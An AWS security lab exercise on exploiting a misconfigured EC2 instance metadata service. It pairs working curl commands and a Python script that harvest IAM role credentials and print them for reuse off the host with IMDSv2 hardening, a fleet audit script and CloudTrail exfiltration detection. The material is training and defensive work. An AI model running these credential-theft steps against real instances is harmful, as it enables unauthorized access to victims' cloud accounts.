Exercise 8: Cloud Instance Metadata Service Attack

Mar 3, 2025

Objective:

Understand the vulnerabilities in cloud instance metadata services and how attackers can exploit them to access sensitive information, including IAM role credentials. Learn how to secure metadata services to prevent credential leaks.


Scenario:

You are conducting a security assessment of an EC2 instance used by a company. During your testing, you find that the instance metadata service (IMDS) is misconfigured, allowing unrestricted access. Your goal is to demonstrate how attackers can exploit this to retrieve sensitive metadata, including IAM role credentials, and provide recommendations to secure the metadata service.


Lab Setup:

Prerequisites:

  1. AWS account (free-tier works for this lab).
  2. Installed tools:
    • curl (pre-installed on most Linux systems).
    • Python or Bash for scripting.

Steps to Set Up the Lab:

Launch a Vulnerable EC2 Instance:

Log in to the AWS Management Console.

Navigate to EC2 > Launch Instance:

Use a public AMI, such as Amazon Linux 2.

Assign an IAM role with excessive permissions (e.g., AdministratorAccess). This is the lab's deliberately over-privileged role; do not attach anything like it to a real workload.

In the Advanced Details section, set Metadata version to "V1 and V2 (token optional)" so that IMDSv1 remains reachable. Amazon Linux 2 launches this way unless you pick "V2 only (token required)"; newer AMIs such as Amazon Linux 2023 default to V2 only, so check the setting rather than assuming the instance is vulnerable.

Verify Instance Metadata Service (IMDS) Accessibility:

Connect to the EC2 instance via SSH:

ssh -i <key-file>.pem ec2-user@<instance-public-ip>

Use curl to access the metadata service:

curl http://169.254.169.254/latest/meta-data/

Verify that the metadata service answers the plain, unauthenticated GET with a list of metadata categories (e.g., ami-id, iam/, instance-id, public-keys/, security-groups). An instance that enforces IMDSv2 returns HTTP 401 Unauthorized to this request instead; if you see that, the lab instance is not yet misconfigured.


Exercise: Exploiting the Metadata Service

Objective:

Simulate an attacker retrieving sensitive information, including IAM credentials, from the metadata service. In a real engagement the attacker rarely has SSH; the requests are made from inside the instance through an SSRF flaw in an application running on it or through code execution, and the SSH shell in this lab only stands in for that foothold.

Retrieve Metadata:

Access the metadata service to enumerate available categories:

curl http://169.254.169.254/latest/meta-data/

Examples of metadata categories:

  • iam/ (instance profile info and, under security-credentials/, the role credentials)
  • public-ipv4
  • instance-id

Retrieve IAM Role Credentials:

Query the IAM credentials endpoint:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

Note the IAM role name and retrieve its credentials:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

The response is a JSON document whose fields include:

  • AccessKeyId (the Access Key ID)
  • SecretAccessKey (the Secret Access Key)
  • Token (the Session Token, required alongside the other two)
  • Expiration (when this set stops working; IMDS hands out a fresh set before then)

Demonstrate Credential Abuse:

Configure the AWS CLI with the retrieved credentials. Note that aws configure only prompts for the access key and secret key; the session token has to be set separately, otherwise every call fails with an InvalidClientTokenId error:

aws configure
aws configure set aws_session_token <Token>

Enter the Access Key ID and Secret Access Key at the prompts (region and output format can be left as they are). The credentials work from any machine, not only from the instance; aws sts get-caller-identity confirms that you are now the instance role's assumed-role session.

Use the credentials to list all S3 buckets:

aws s3 ls
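The enumeration and credential-retrieval steps above, automated in Python. This is an added example and not code from the original exercise: it walks the metadata tree the same way the curl commands do, issuing plain IMDSv1 GETs and falling back to an IMDSv2 token only if the plain request is refused, then reads the role credential document and prints it as the three environment variables the AWS CLI reads (which, unlike aws configure on its own, carries the session token). walk() and role_credentials() take the fetch function as a parameter so the logic can be exercised offline against a constructed tree; only the __main__ block talks to 169.254.169.254.

```python
#!/usr/bin/env python3
"""Added example, not from the original exercise: automate the curl steps.

Walks the IMDS tree, extracts the role credential document and turns it into
the environment variables the AWS CLI reads. walk()/role_credentials() take a
fetch(path) callable so the logic can be tested offline; only main() talks to
169.254.169.254."""
import json
import urllib.error
import urllib.request

IMDS = "http://169.254.169.254"
CREDS_PATH = "latest/meta-data/iam/security-credentials/"


def imds_token(ttl=21600):
    """IMDSv2 session token: a PUT with a TTL header. None if refused."""
    req = urllib.request.Request(
        f"{IMDS}/latest/api/token", method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl)})
    try:
        with urllib.request.urlopen(req, timeout=2) as resp:
            return resp.read().decode()
    except (urllib.error.URLError, OSError):
        return None


def imds_get(path, token=None):
    """GET a metadata path. With no token this is an IMDSv1 request, which
    is exactly what a 'token optional' instance answers."""
    headers = {"X-aws-ec2-metadata-token": token} if token else {}
    req = urllib.request.Request(f"{IMDS}/{path}", headers=headers)
    with urllib.request.urlopen(req, timeout=2) as resp:
        return resp.read().decode()


def walk(fetch, path="latest/meta-data/"):
    """Recursively walk an IMDS directory listing into a nested dict.

    Directory responses are newline-separated names; a trailing '/' marks
    a sub-directory. Entries that are not directly fetchable (public-keys/
    lists '0=keyname' rather than a path) are recorded as None."""
    try:
        listing = fetch(path)
    except Exception:
        return None
    tree = {}
    for name in listing.splitlines():
        if not name:
            continue
        if name.endswith("/"):
            tree[name] = walk(fetch, path + name)
        else:
            try:
                tree[name] = fetch(path + name)
            except Exception:
                tree[name] = None
    return tree


def role_credentials(fetch):
    """{role_name: credential document} for every role listed under
    iam/security-credentials/ (normally exactly one)."""
    return {role: json.loads(fetch(CREDS_PATH + role))
            for role in fetch(CREDS_PATH).split()}


def as_env(doc):
    """Map the credential document onto the variables the AWS CLI and SDKs
    read; unlike 'aws configure', this carries the session token too."""
    return {"AWS_ACCESS_KEY_ID": doc["AccessKeyId"],
            "AWS_SECRET_ACCESS_KEY": doc["SecretAccessKey"],
            "AWS_SESSION_TOKEN": doc["Token"]}


if __name__ == "__main__":
    # Try the misconfiguration first (IMDSv1); if the instance enforces v2
    # (HTTP 401), fall back to fetching a token and continue with v2.
    token = None
    try:
        imds_get("latest/meta-data/")
    except urllib.error.HTTPError:
        token = imds_token()
    fetch = lambda p: imds_get(p, token)
    print(json.dumps(walk(fetch), indent=2))
    for role, doc in role_credentials(fetch).items():
        print(f"# role {role}, expires {doc.get('Expiration')}")
        for key, value in as_env(doc).items():
            print(f"export {key}={value}")
```

Run it on the instance and feed the export lines to a shell on the attacker side; because it also succeeds through the v2 token path when it has a foothold on the host, the script doubles as a check that enforcing IMDSv2 alone does not stop an attacker who already has code execution, only one who is limited to plain-GET SSRF.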


Tools Required:

  1. AWS EC2: For launching the vulnerable instance.
  2. curl: For querying the metadata service.
  3. Python/Bash: For automating metadata enumeration.
  4. aws-cli: For abusing retrieved IAM credentials.

Deliverables:

  1. Exploit Report:
    • Evidence of retrieving metadata and IAM credentials.
    • Screenshots showing unauthorized access to AWS resources using the credentials.
  2. Recommendations for Securing Metadata Services:
    • Detailed strategies to harden IMDS and IAM configurations.

Solution:

Identified Vulnerabilities:

IMDSv1 Accessibility: Metadata was accessible without authentication or session tokens.

Excessive IAM Permissions: The assigned role had permissions that could be abused by attackers.

Consequences:

Credential Theft: Attackers can retrieve and misuse IAM role credentials to access AWS resources.

Data Breach: Sensitive resources like S3 buckets or databases could be accessed.

Service Disruption: Attackers can modify or delete resources using the stolen credentials.

Prevention Techniques:

Enforce IMDSv2:

Configure the EC2 instance to use IMDSv2 only:

aws ec2 modify-instance-metadata-options --instance-id <instance-id> --http-tokens required

This requires all metadata queries to carry a session token that is first obtained with a PUT to /latest/api/token; the plain curl used above now receives HTTP 401. On instances that run containers, also keep the --http-put-response-hop-limit at 1 so that the token PUT cannot be answered through an extra network hop from a container's namespace. Confirm the change in the MetadataOptions block of aws ec2 describe-instances, which should show HttpTokens as required. For new launches, set the same option in the launch template, or make it the regional account default with aws ec2 modify-instance-metadata-defaults --http-tokens required.
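An added example (not part of the original exercise) that audits a fleet for the two settings that keep the attack above possible and applies the same fix as the CLI command through boto3. It works on the MetadataOptions block of describe-instances output: HttpTokens anything other than required means IMDSv1 still answers, a HttpPutResponseHopLimit above 1 lets the IMDSv2 token exchange complete through an extra hop, and an attached instance profile is what makes either finding matter. The describe-instances sample is constructed, and boto3 is only imported on the --live path, so the audit logic itself runs offline.

```python
#!/usr/bin/env python3
"""Added example (not from the page): find instances on which the attack
above still works, and apply the page's IMDSv2 fix to them.

Assumptions (not from the page): the describe-instances sample is
constructed; boto3 is only imported when the script is run live."""
import sys


def audit_metadata_options(reservations, max_hop_limit=1):
    """Return {instance_id: [finding, ...]} from describe-instances output.

    HttpTokens 'optional' means plain GETs (IMDSv1) are answered, which is
    the misconfiguration exploited above. A hop limit above 1 lets a request
    forwarded through one extra hop (a container's network namespace)
    complete the IMDSv2 token exchange. An attached instance profile is what
    makes either one worth reporting loudly."""
    findings = {}
    for reservation in reservations:
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint", "enabled") == "disabled":
                continue  # endpoint off: nothing for an attacker to read
            problems = []
            tokens = opts.get("HttpTokens", "optional")
            if tokens != "required":
                problems.append(f"IMDSv1 allowed (HttpTokens={tokens})")
            hops = opts.get("HttpPutResponseHopLimit", 1)
            if hops > max_hop_limit:
                problems.append(f"hop limit {hops} > {max_hop_limit}")
            if problems and "IamInstanceProfile" in inst:
                problems.append("instance profile attached: "
                                + inst["IamInstanceProfile"]["Arn"])
            if problems:
                findings[inst["InstanceId"]] = problems
    return findings


def enforce_imdsv2(ec2, instance_id, hop_limit=1):
    """The page's CLI command through boto3, plus the hop limit. Returns the
    InstanceMetadataOptions the API reports back."""
    resp = ec2.modify_instance_metadata_options(
        InstanceId=instance_id,
        HttpTokens="required",
        HttpEndpoint="enabled",
        HttpPutResponseHopLimit=hop_limit,
    )
    return resp["InstanceMetadataOptions"]


# Constructed describe-instances output: the lab instance (v1 allowed, admin
# profile), a hop-limit-2 instance, a clean one, and one with IMDS disabled.
SAMPLE_RESERVATIONS = [{"Instances": [
    {"InstanceId": "i-0123456789abcdef0",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1},
     "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/LabAdminRole"}},
    {"InstanceId": "i-0fedcba9876543210",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                         "HttpPutResponseHopLimit": 2}},
    {"InstanceId": "i-0aaaaaaaaaaaaaaaa",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                         "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0bbbbbbbbbbbbbbbb",
     "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1}},
]}]


if __name__ == "__main__":
    if "--live" in sys.argv:
        import boto3
        ec2 = boto3.client("ec2")
        pages = ec2.get_paginator("describe_instances").paginate()
        reservations = [r for page in pages for r in page["Reservations"]]
    else:
        ec2, reservations = None, SAMPLE_RESERVATIONS
    for iid, problems in audit_metadata_options(reservations).items():
        print(iid, "; ".join(problems))
        if ec2 is not None and "--fix" in sys.argv:
            print("  ->", enforce_imdsv2(ec2, iid))
```

Run it without arguments to see the findings on the constructed sample, with --live to audit the account the current credentials can see, and with --live --fix to enforce IMDSv2 on each flagged instance. Check the MetadataNoToken CloudWatch metric for an instance before fixing it: a non-zero count means something on that host still calls IMDSv1 and will break when the token becomes mandatory.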

Restrict IAM Role Permissions:

Follow the principle of least privilege to minimize permissions granted to IAM roles.

Regularly audit IAM roles using AWS IAM Access Analyzer.

Restrict Access on the Host:

Security groups and network ACLs cannot help here: 169.254.169.254 is a link-local address and the request never leaves the instance, so VPC-level filtering never sees it. Restrict access where the request originates instead. A host firewall rule that only lets the service account that actually needs the role reach 169.254.169.254 (for example an iptables OUTPUT rule matched with --uid-owner) stops a compromised web-application process from reading the credentials; on instances that need no metadata at all, disable the endpoint entirely with --http-endpoint disabled. Where the attacker's foothold is an SSRF flaw, fix the application as well: outbound requests built from user input should reject link-local and loopback destinations.

Monitor Use of the Credentials:

CloudTrail does not record metadata requests themselves; they are local HTTP calls that never reach an AWS API. What CloudTrail does record is every API call made with the stolen credentials. Those calls appear under the instance role's assumed-role session, whose session name is the instance ID, so a call with that identity from a source IP address that is not the instance is the signature of exfiltration. GuardDuty raises exactly this as UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS (and .InsideAWS when the credentials are used from another AWS account). For the configuration side, the EC2 CloudWatch metric MetadataNoToken counts IMDSv1 calls per instance, which shows which workloads still depend on v1 before you enforce v2.
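An added example (not part of the original exercise) of the detection described above, run over CloudTrail records: it picks out calls signed with instance-profile credentials by the assumed-role session name (the instance ID) and flags any made from an address the instance does not use. The records, account ID, instance ID and IP addresses are constructed; a real deployment would feed it the Records array of CloudTrail log files and a map of instance IDs to their public and private IPs built from describe-instances.

```python
#!/usr/bin/env python3
"""Added example (not from the page): detect use of stolen instance-role
credentials in CloudTrail records.

Assumptions (not from the page): the sample records, account ID and IP
addresses are constructed; the logic is the essence of what GuardDuty's
InstanceCredentialExfiltration findings check."""
import json


def instance_role_session(record):
    """Return the instance ID when a record was signed with credentials from
    an EC2 instance profile. Those credentials are an assumed-role session
    whose session name is the instance ID, e.g.
    arn:aws:sts::123456789012:assumed-role/LabAdminRole/i-0123456789abcdef0"""
    identity = record.get("userIdentity", {})
    if identity.get("type") != "AssumedRole":
        return None
    session = identity.get("arn", "").rsplit("/", 1)[-1]
    return session if session.startswith("i-") else None


def find_exfiltrated_use(records, instance_ips):
    """records: parsed CloudTrail event records.
    instance_ips: {instance_id: set of addresses the instance legitimately
    appears as (its public IP, or a private IP when calls go through VPC
    endpoints)}. Returns one finding per call made with instance-role
    credentials from anywhere else."""
    findings = []
    for rec in records:
        iid = instance_role_session(rec)
        if iid is None:
            continue
        src = rec.get("sourceIPAddress", "")
        # Calls AWS services make on the instance's behalf carry a service
        # name instead of an address; those are not exfiltration.
        if src.endswith(".amazonaws.com"):
            continue
        if src in instance_ips.get(iid, set()):
            continue
        findings.append({
            "instance": iid,
            "sourceIP": src,
            "call": f'{rec.get("eventSource")}:{rec.get("eventName")}',
            "time": rec.get("eventTime"),
        })
    return findings


ROLE_ARN = "arn:aws:sts::123456789012:assumed-role/LabAdminRole/i-0123456789abcdef0"

# Constructed sample: the lab instance (203.0.113.10) listing buckets itself,
# the same session used from an unrelated address, a service-initiated call,
# and an ordinary IAM user from that same unrelated address.
SAMPLE_RECORDS = [
    {"eventTime": "2025-03-03T10:00:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}},
    {"eventTime": "2025-03-03T10:05:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets", "sourceIPAddress": "198.51.100.77",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}},
    {"eventTime": "2025-03-03T10:06:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "DescribeInstances", "sourceIPAddress": "ec2.amazonaws.com",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}},
    {"eventTime": "2025-03-03T10:07:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "ListUsers", "sourceIPAddress": "198.51.100.77",
     "userIdentity": {"type": "IAMUser",
                      "arn": "arn:aws:iam::123456789012:user/alice"}},
]
KNOWN_INSTANCE_IPS = {"i-0123456789abcdef0": {"203.0.113.10", "10.0.1.25"}}


def load_records(path):
    """Read one CloudTrail log file ({"Records": [...]}) from disk."""
    with open(path) as fh:
        return json.load(fh)["Records"]


if __name__ == "__main__":
    for finding in find_exfiltrated_use(SAMPLE_RECORDS, KNOWN_INSTANCE_IPS):
        print(json.dumps(finding))
```

The instance-to-address map is the part that needs care in production: instances behind a NAT gateway share its public IP, so map them to the NAT address rather than their own, and keep the map current or a legitimately replaced instance will show up as a false positive.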

Use Temporary Credentials:

The credentials IMDS hands out are already temporary and rotated automatically, so rotation on its own is not the control here: an attacker who can still reach IMDS simply fetches the next set. The point is to keep long-lived access keys off the instance entirely (none in files, environment variables or user data), so that the only credentials present are the short-lived role credentials, and to scope that role to the task at hand so that a stolen set is worth as little as possible for as short a time as possible.


Conclusion:

This exercise highlights the risks of leaving the instance metadata service reachable by any process on the host. By enforcing IMDSv2, minimizing IAM permissions, restricting which local processes can reach the endpoint, and watching CloudTrail for the instance role's session being used from elsewhere, organizations can protect sensitive metadata and prevent credential theft.
